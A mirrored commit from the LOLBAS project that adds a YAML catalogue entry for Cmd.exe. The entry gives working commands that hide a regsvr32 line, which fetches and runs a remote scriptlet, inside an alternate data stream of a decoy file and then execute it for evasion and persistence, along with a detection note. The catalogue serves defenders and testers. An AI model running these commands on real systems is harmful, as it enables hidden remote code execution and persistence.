mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Cmd.exe ADS
This commit is contained in:
parent
af19552915
commit
fb5f164827
30
yml/OSBinaries/Cmd.exe.yml
Normal file
30
yml/OSBinaries/Cmd.exe.yml
Normal file
@ -0,0 +1,30 @@
|
||||
Name: Cmd.exe
|
||||
Description: The command-line interpreter in Windows
|
||||
Author: 'Ye Yint Min Thu Htut'
|
||||
Created: '2019-06-26'
|
||||
Commands:
|
||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||
Description: To add content in an Alternate Data Stream (ADS).
|
||||
|
||||
Command: cmd.exe - < fakefile.doc:payload.bat
|
||||
Description: Execute payload.bat which is stored in an Alternate Data Stream (ADS).
|
||||
|
||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmd.exe
|
||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: cmd.exe executing files from alternate data streams.
|
||||
Resources:
|
||||
- Link: https://twitter.com/yeyint_mth/status/1143824979139579904
|
||||
Acknowledgement:
|
||||
- Person: r0lan
|
||||
Handle: '@yeyint_mth'
|
||||
---
|
Loading…
Reference in New Issue
Block a user